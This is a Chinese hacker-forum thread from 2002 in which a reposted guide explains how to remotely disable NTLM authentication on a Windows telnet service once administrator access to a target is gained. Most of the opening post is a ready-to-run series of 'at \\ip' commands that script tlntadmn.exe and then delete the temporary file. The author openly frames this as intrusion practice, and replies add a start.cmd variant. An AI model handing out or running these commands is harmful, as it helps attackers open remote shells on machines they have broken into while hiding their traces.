>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  [精品]远程屏蔽telnet服务的ntlm认证[转帖]
发表文章 发表涂鸦
  回复数:3  点击数:266 将此页发给您的朋友        
作者 主题: [精品]远程屏蔽telnet服务的ntlm认证[转帖] 回复 | 收藏 | 打印 | 篇末
小蔡帅哥哦
级别:精灵王
威望:0
经验:27
货币:3111
体力:100
来源:四川
总发帖数:439
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

不需要任何工具,远程屏蔽telnet服务的ntlm认证  
很多人获得上传文件的权限和管理员权限以后想启动远程的tlelnet服务,但是却碰到
讨厌的NTLM认证,对于这种情况,我们很多时候就采用上传文件(比如NTLM.exe),然后at远程定时执行,如果手头上没有这样的工具怎么办呢?
可以这么做:
大家可以看一下win2000和nt4自带tlntadmn这个命令,他是用来控制台修改telnet设置的,很可惜这是一个控制台的交互式工具,所以at命令没有办法直接调用。
现在我们执行一下tlntadmn,然后按照以下的顺序操作
停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0)
现在大家记住了吧,先后顺序是5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车)
线在我们这么做
at \\ip time "echo 5 > c:\t.txt"
at \\ip time "echo 3 >> c:\t.txt"
at \\ip time "echo 7 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo 4 >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
呵呵按照上面的顺序一步一步执行
当然你本地做一个t.txt文件也可以,内容如下:
5
3
7
y
0
y
0
4
0
每个字符后面要加回车,然后copy t.txt \\ip\c$
然后再
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
很简单的dos重定向原理,t.txt就相当于手工输入一系列的操作,完成tlntadmn的交互
呵呵

当然,你们可以在本地试验好以后再发到远程主机去
我但是劝大家练习入侵的时候尽量不要使用工具,这样对自己没有帮助的




[ 此消息由 小蔡 在 2002-03-27.21:34:39 编辑过 ]

编辑 删除 发表时间发表于 2002-03-27.21:11:08   MSIE 5.01 Windows 2000IP: 已记录
foxwywh帅哥哦
级别:一般站友
威望:0
经验:0
货币:
体力:
来源:61.180.104.*
总发帖数:12
注册日期:2002-03-17
查看 邮件 主页 QQ 消息 引用 复制 下载 

你试过码????? 好像不行!!!!!!!!!!!!

编辑 删除 发表时间发表于 2002-03-28.11:19:58   MSIE 5.01 Windows 2000IP: 已记录
BlackBird帅哥哦
级别:老 站 友
威望:0
经验:4
货币:42
体力:41.4
来源:temps
总发帖数:372
注册日期:2002-02-06
查看 邮件 主页 QQ 消息 引用 复制 下载 

行。
----------------------------------------------------------
注意安全!

编辑 删除 发表时间发表于 2002-03-28.12:13:22   MSIE 5.01 Windows 2000IP: 已记录
foxwywh帅哥哦
级别:一般站友
威望:0
经验:0
货币:
体力:
来源:61.180.104.*
总发帖数:12
注册日期:2002-03-17
查看 邮件 主页 QQ 消息 引用 复制 下载 

start.cmd为:
%systemroot%\system32\tlntadmn.exe < %systemroot%\winnt\system32\ntlm.txt
ntlm.txt为:
3

7

y

0

y

0

4

0
但是不行

编辑 删除 发表时间发表于 2002-03-28.12:40:10   MSIE 5.01 Windows 2000IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符

[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题